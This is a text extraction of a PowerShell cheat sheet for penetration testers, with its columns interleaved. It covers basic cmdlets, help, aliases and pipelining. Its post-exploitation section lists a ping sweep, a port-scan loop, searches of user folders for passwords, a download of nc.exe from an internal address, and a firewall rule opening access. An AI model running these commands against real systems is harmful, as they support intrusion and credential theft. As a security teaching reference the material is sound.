Anda di halaman 1dari 2

Useful Cmdlets (and aliases) PowerShell for Pen-Tester Post-Exploitation

PowerShell
Get a directory listing (ls, dir, gci): Conduct a ping sweep:
PS C:\> Get-ChildItem PS C:\> 1..255 | % {echo "10.10.10.$_"; Cheat Sheet
ping -n 1 -w 100 10.10.10.$_ | Select- v. 4.0
Copy a file (cp, copy, cpi): String ttl}
PS C:\> Copy-Item src.txt dst.txt POCKET REFERENCE
GUIDE
Conduct a port scan:
Move a file (mv, move, mi): PS C:\> 1..1024 | % {echo ((new-object http://www.sans.org
PS C:\> Move-Item src.txt dst.txt Net.Sockets.TcpClient).Connect("10.10.10
.10",$_)) "Port $_ is open!"} 2>$null
Find text within a file:
Purpose
PS C:\> Select-String –path c:\users Fetch a file via HTTP (wget in PowerShell):
\*.txt –pattern password PS C:\> (New-Object The purpose of this cheat sheet is to
PS C:\> ls -r c:\users -file | % System.Net.WebClient).DownloadFile("http describe some common options and
{Select-String -path $_ -pattern ://10.10.10.10/nc.exe","nc.exe") techniques for use in Microsoft’s
password} PowerShell.
Find all files with a particular name:
Display file contents (cat, type, gc): PS C:\> Get-ChildItem "C:\Users\" -
PS C:\> Get-Content file.txt recurse -include *passwords*.txt

Get present directory (pwd, gl): Get a listing of all installed Microsoft Hotfixes: PowerShell Overview
PS C:\> Get-Location PS C:\> Get-HotFix PowerShell Background

Get a process listing (ps, gps): Navigate the Windows registry: PowerShell is the successor to command.com,
PS C:\> Get-Process PS C:\> cd HKLM:\ cmd.exe and cscript. Initially released as a
PS HKLM:\> ls separate download, it is now built in to all modern
Get a service listing: versions of Microsoft Windows. PowerShell
PS C:\> Get-Service List programs set to start automatically in the registry: syntax takes the form of verb-noun patterns
PS C:\> Get-ItemProperty HKLM:\SOFTWARE implemented in cmdlets.
Formatting output of a command (Format-List): \Microsoft\Windows\CurrentVersion\run
PS C:\> ls | Format-List –property Launching PowerShell
name Convert string from ascii to Base64:
PS C:\> PowerShell is accessed by pressing Start ->
Paginating output: [System.Convert]::ToBase64String([System typing powershell and pressing enter.
PS C:\> ls –r | Out-Host -paging .Text.Encoding]::UTF8.GetBytes("PS Some operations require administrative privileges
FTW!")) and can be accomplished by launching
Get the SHA1 hash of a file: PowerShell as an elevated session. You can
PS C:\> Get-FileHash -Algorithm SHA1 List and modify the Windows firewall rules: launch an elevated PowerShell by pressing Start -
file.txt PS C:\> Get-NetFirewallRule –all > typing powershell and pressing Shift-CTRL-
PS C:\> New-NetFirewallRule -Action Enter.
Exporting output to CSV: Allow -DisplayName LetMeIn - Additionally, PowerShell cmdlets can be called
PS C:\> Get-Process | Export-Csv RemoteAddress 10.10.10.25 from cmd.exe by typing: powershell -c
procs.csv "<command>".
Syntax Getting Help 5 PowerShell Essentials
Cmdlets are small scripts that follow a dash- To get help with help: Concept What’s it A Handy Alias
separated verb-noun convention such as "Get- PS C:\> Get-Help Do?
Process".
PS C:\> Get-Help Shows help & PS C:\> help
To read cmdlet self documentation: [cmdlet] - examples [cmdlet] -
Similar Verbs with Different Actions: PS C:\> Get-Help <cmdlet> examples examples
- New- Creates a new resource
-  Set- Modifies an existing resource Detailed help: PS C:\> Get- Shows a list of PS C:\> gcm
-  Get- Retrieves an existing resource PS C:\> Get-Help <cmdlet> -detailed Command commands *[string]*
-  Read- Gets information from a source, such
as a file Usage examples: PS C:\> Get- Shows properties PS C:\> [cmdlet]
Member & methods | gm
-  Find- Used to look for an object PS C:\> Get-Help <cmdlet> -examples
-  Search- Used to create a reference to a
resource Full (everything) help: PS C:\> ForEach- Takes each item PS C:\> [cmdlet]
Object { $_ } on pipeline and | % { [cmdlet]
-  Start- (asynchronous) begin an operation, PS C:\> Get-Help <cmdlet> -full handles it as $_ $_ }
such as starting a process
-  Invoke- (synchronous) perform an operation Online help (if available): PS C:\> Select- Searches for PS C:\> sls –path
such as running a command PS C:\> Get-Help <cmdlet> -online String strings in files or [file] –pattern
output, like grep [string]

Parameters:
Each verb-noun named cmdlet may have many
Pipelining, Loops, and Variables
parameters to control cmdlet functionality.
Piping cmdlet output to another cmdlet:
Objects: Cmdlet Aliases PS C:\> Get-Process | Format-List
The output of most cmdlets are objects that can –property name
be passed to other cmdlets and further acted Aliases provide short references to long
commands.
upon. This becomes important in pipelining ForEach-Object in the pipeline (alias %):
cmdlets. PS C:\> ls *.txt | ForEach-Object
To list available aliases (alias alias):
{cat $_}
PS C:\> Get-Alias
Where-Object condition (alias where or ?):
To expand an alias into a full name:
PS C:\> Get-Process | Where-Object
PS C:\> alias <unknown alias>
{$_.name –eq "notepad"}
PS C:\> alias gcm
Finding Cmdlets
Generating ranges of numbers and looping:
To get a list of all available cmdlets: PS C:\> 1..10
PS C:\> Get-Command Efficient PowerShell PS C:\> 1..10 | % {echo "Hello!"}

Get-Command supports filtering. To filter cmdlets Tab completion:


PS C:\> get-child<TAB> Creating and listing variables:
on the verb set: PS C:\> $tmol = 42
PS C:\> Get-Command Set* or PS C:\> Get-ChildItem
PS C:\> ls variable:
PS C:\> Get-Command –Verb Set
Parameter shortening:
PS C:\> ls –recurse is equivalent to: Examples of passing cmdlet output down pipeline:
Or on the noun process: PS C:\> dir | group extension | sort
PS C:\> ls -r
PS C:\> Get-Command *Process or PS C:\> Get-Service dhcp | Stop-
PS C:\> Get-Command –Noun process Service -PassThru | Set-Service -
StartupType Disabled